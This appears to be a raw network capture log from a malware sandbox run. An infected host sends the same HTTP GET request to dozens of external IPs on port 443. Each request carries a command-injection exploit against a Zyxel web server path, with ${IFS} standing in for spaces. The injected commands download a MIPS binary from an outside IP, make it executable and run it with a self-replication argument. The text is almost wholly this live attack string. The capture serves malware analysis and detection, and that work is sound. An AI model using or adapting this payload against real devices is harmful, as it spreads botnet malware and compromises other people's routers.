                                      Jan 19, 2024 17:29:53.187809944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9570192.168.2.1450798144.57.179.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.187846899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9571192.168.2.144505064.137.136.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.187899113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9572192.168.2.1451926105.255.44.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.187988997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9573192.168.2.1457866191.57.171.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.188009024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9574192.168.2.1447048115.167.182.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.188071012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9575192.168.2.1445084180.233.75.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.188088894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9576192.168.2.1457018148.191.194.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.188153028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9577192.168.2.1439470144.23.44.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.188203096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9578192.168.2.144502487.8.9.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.188237906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9579192.168.2.1445792118.39.220.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.188273907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9580192.168.2.1456674115.12.85.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.188321114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9581192.168.2.1448242166.255.90.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.188342094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9582192.168.2.1438886151.18.41.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.188404083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9583192.168.2.1452542177.105.1.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.188426018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9584192.168.2.145197298.213.160.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.188467026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9585192.168.2.1451064134.204.59.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.188513994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9586192.168.2.145845492.69.28.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.188534021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9587192.168.2.1443174128.152.207.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.188585043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9588192.168.2.1437064199.241.133.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.188642979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9589192.168.2.1434542203.109.183.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.188678980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9590192.168.2.143803894.126.55.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.188745022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9591192.168.2.144254286.165.103.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.188770056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9592192.168.2.1452126182.19.149.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.188823938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9593192.168.2.144790044.71.43.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.188852072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9594192.168.2.143960071.181.139.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.188889980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9595192.168.2.1436196150.152.29.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.188925982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9596192.168.2.143939072.66.169.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.188960075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9597192.168.2.144247051.182.93.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.189001083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9598192.168.2.144374072.86.72.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.189033985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9599192.168.2.144158447.119.63.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.189080000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9600192.168.2.1433308135.197.2.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.189131975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9601192.168.2.145419231.27.124.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.189153910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9602192.168.2.143573878.150.44.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.189217091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9603192.168.2.1448096220.202.79.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.189256907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9604192.168.2.1449258194.181.63.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.189307928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9605192.168.2.143892065.210.87.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.189342022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9606192.168.2.1432846170.255.23.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.189390898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9607192.168.2.144836697.195.79.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.189418077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9608192.168.2.1453700138.75.252.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.189466953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9609192.168.2.1437016209.234.238.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.189517975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9610192.168.2.1450790119.17.172.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.189547062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9611192.168.2.1450276171.150.255.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.189594984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9612192.168.2.145517850.238.252.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.189625978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9613192.168.2.1451110145.187.155.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.189662933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9614192.168.2.1446242132.134.77.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.189681053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9615192.168.2.143350693.89.115.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.189718008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9616192.168.2.145838247.116.77.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.189760923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9617192.168.2.14558262.220.142.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.189805031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9618192.168.2.1435240189.246.138.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.189846039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9619192.168.2.144584060.84.65.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.189897060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9620192.168.2.1449862183.210.62.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.189929962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9621192.168.2.1444978177.55.34.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.189991951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9622192.168.2.1446976188.24.230.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.190030098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9623192.168.2.1439766166.198.22.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.190058947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9624192.168.2.1444944157.253.133.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.190088034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9625192.168.2.1447260134.45.24.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.190140009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9626192.168.2.1447286169.240.115.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.190191984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9627192.168.2.144112291.173.107.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.190222979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9628192.168.2.1437598158.162.122.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.190258026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9629192.168.2.1455240153.236.201.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.190283060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9630192.168.2.1439658203.245.113.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.190346003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9631192.168.2.1437910161.239.210.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.190422058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9632192.168.2.145309446.171.98.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.190433025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9633192.168.2.144709262.86.15.8443
                                      TimestampBytes transferredDirectionData
